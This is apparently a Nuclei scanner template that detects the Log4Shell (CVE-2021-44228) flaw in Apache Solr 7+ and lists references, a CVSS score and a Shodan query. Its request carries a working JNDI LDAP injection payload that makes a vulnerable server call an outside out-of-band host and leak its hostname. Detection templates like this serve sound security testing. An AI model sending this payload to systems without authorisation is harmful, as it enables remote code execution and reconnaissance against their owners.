id: apache-solr-log4j-rce info: name: Apache Solr 7+ - Remote Code Execution (Apache Log4j) author: Evan Rubinstein,nvn1729 severity: critical description: | Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+. reference: - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228 - https://twitter.com/sirifu4k1/status/1470011568834424837 - https://github.com/apache/solr/pull/454 - https://logging.apache.org/log4j/2.x/security.html - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: shodan-query: http.html:"Apache Solr" verified: "true" tags: cve,cve2021,solr,oast,log4j,rce,apache,jndi,kev requests: - method: GET path: - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" matchers-condition: and matchers: - type: word part: body words: - "String index out of range" - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output - type: regex part: interactsh_request group: 1 regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output # Enhanced by mp on 2022/05/27